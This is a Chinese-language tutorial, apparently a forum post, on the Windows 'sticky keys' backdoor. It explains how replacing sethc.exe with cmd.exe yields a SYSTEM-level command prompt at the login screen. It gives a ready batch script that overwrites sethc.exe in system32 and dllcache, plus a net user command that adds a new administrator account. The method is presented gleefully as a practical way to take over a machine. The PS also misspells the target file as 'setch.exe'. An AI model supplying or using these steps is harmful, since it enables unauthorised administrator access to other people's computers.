shift後門提權

首先,要說的是不論幹什麼，強調的是原理 所以在這裏把後門的原理講清楚

首先,我們要說的是shift這個鍵連續按5下它會自動彈出個對話框.這個是windows裏面自帶的功能鍵
連續按5下後操作系統會自動找到c:\windows\system32\ 下面一個叫sethc.exe 的程序, 然後會彈出如下對話框
[attachment=9]

在進程裏面我們可以看到這個程序被系統運行了 不過是以我們自己的用戶運權限行的
[attachment=8]

但是當我們未登陸系統(停留在登陸界面)的時候 系統還不知道我們將以哪個用戶登陸,所以在這個時候連續按5次shift後門的話系統將會以system用戶(具有管理員級別的權限)來運行sethc.exe這個程序 那麼試想一下如果我們把cmd.exe這個程序更名稱sethc.exe並且把原來的sethc.exe替換掉的話 那麼在登陸界面的時候我們連續按下5吃shift鍵系統以system權限就會運行我們的CMD.exe 那麼我們的cmd.exe就具有了管理員權限了 如此一來 我們只要利用CMD加一個管理員用戶就可以登陸進去了 嘿嘿~~是不是很過癮呢~~

具體操作如下

寫一個批處理程序來實現吧

新建一個記事本 然後輸入以下內容,並保存爲.bat後綴的文件

echo 提權開始......
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
copy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc.exe
echo 提權結束......


雙擊下這個BAT文件然後註銷到登陸界面按5次shift 會彈出個cmd命令行

在裏面輸入如下內容

net user 你要添加的用戶名 密碼 /add && net localgroup administrators 你要添加的用戶名 /add



然後以你添加的用戶和密碼登陸就可以了 這個時候你的帳戶就是管理員權限了 嘿嘿~~~

PS:這招我好久沒用了 如果不行的話就自己手動去c:\windows\system32\下找CMD.exe改名成setch.exe把
c:\windows\system32\dllcache\ 和c:\windows\system32\ 下的sethc.exe給替換了就可以了